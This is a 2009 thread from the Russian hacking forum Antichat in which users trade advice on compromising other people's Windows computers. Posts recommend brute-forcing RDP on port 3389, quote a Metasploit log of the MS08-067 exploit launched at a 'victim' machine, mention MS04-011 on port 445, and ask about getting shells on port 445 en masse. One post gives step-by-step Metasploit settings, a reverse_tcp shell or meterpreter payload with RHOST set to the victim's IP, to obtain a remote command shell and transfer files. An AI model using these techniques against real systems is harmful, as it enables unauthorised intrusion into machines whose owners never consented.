Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

22.03.2009, 01:15
|
|
Banned
Регистрация: 10.07.2008
Сообщений: 49
Провел на форуме: 458180
Репутация:
16
|
|
юзай лучше брут по 3389 порту, больше эффукта будет
|
|
|

22.03.2009, 12:15
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме: 919131
Репутация:
74
|
|
в аську мне напиши кароче!!!
Ок, написал
да рече нет тама открыт порт ТОКА линукс на всех тачках СТОИТ ))
Да я их написал, чтобы люди могли посмотреть, находит ли у них открытый порт или нет.
|
|
|

22.03.2009, 12:27
|
|
Участник форума
Регистрация: 13.09.2008
Сообщений: 101
Провел на форуме: 718785
Репутация:
42
|
|
Сообщение от 4adr0s
Тема 2:
Сцапал еще одного поцика, снова действия как и прежде..
Код:
23:18:47 - ms08_067_netapi[*] Launching exploit windows/smb/ms08_067_netapi...
23:18:48 - ms08_067_netapi[*] Started reverse handler
23:18:51 - ms08_067_netapi[*] Automatically detecting the target...
23:19:03 - ms08_067_netapi[*] Fingerprint: Windows XP Service Pack 2 - lang:Japanese
23:19:03 - ms08_067_netapi[*] Selected Target: Windows XP SP2 Japanese (NX)
23:19:04 - ms08_067_netapi[*] Triggering the vulnerability...
и тишина........
Не ленись!!!(link)
Тачку находит, а багу нет. Таких много будет.
|
|
|

22.03.2009, 14:31
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме: 919131
Репутация:
74
|
|
|
|
|

22.03.2009, 14:33
|
|
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме: 3687629
Репутация:
558
|
|
Ура !
ps: этому сплойту уже сто лет в обед 
|
|
|

22.03.2009, 15:03
|
|
Познающий
Регистрация: 14.12.2007
Сообщений: 79
Провел на форуме: 329826
Репутация:
75
|
|
Кстати, на 445 порту крутится и другой вулнерабили ) MS04-011, именно его я тоже запускал, но меня откинули нах, сказали, что нет доступа )
|
|
|

25.03.2009, 04:52
|
|
Новичок
Регистрация: 26.07.2007
Сообщений: 17
Провел на форуме: 94736
Репутация:
1
|
|
А вот у меня какая проблема. Прервал установку метасплоита, и теперь не запускается вообще никак. Прервал на этапе бегущих строк в командной. Есть предложения?
|
|
|

25.03.2009, 09:19
|
|
Участник форума
Регистрация: 14.12.2008
Сообщений: 118
Провел на форуме: 1059002
Репутация:
129
|
|
Сообщение от zool
А вот у меня какая проблема. Прервал установку метасплоита, и теперь не запускается вообще никак. Прервал на этапе бегущих строк в командной. Есть предложения?
ДА переустанови полность и все только удоли.
|
|
|

25.03.2009, 21:34
|
|
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме: 2253612
Репутация:
94
|
|
не придумали еще способ получать шелы на 445 массово ?)
|
|
|

26.03.2009, 19:31
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме: 2584838
Репутация:
770
|
|
Сообщение от Stopxaker
Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы
Есть альтернативный вариант: выбрать начинку windows/meterpreter/reverse_tcp
одноввеменно имеем возможность напрямую обмениваться файлами (rightclick -> browse) и командную строку.
[исключаем пункт с фтп и заливкой файлов ч/з радмин]
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|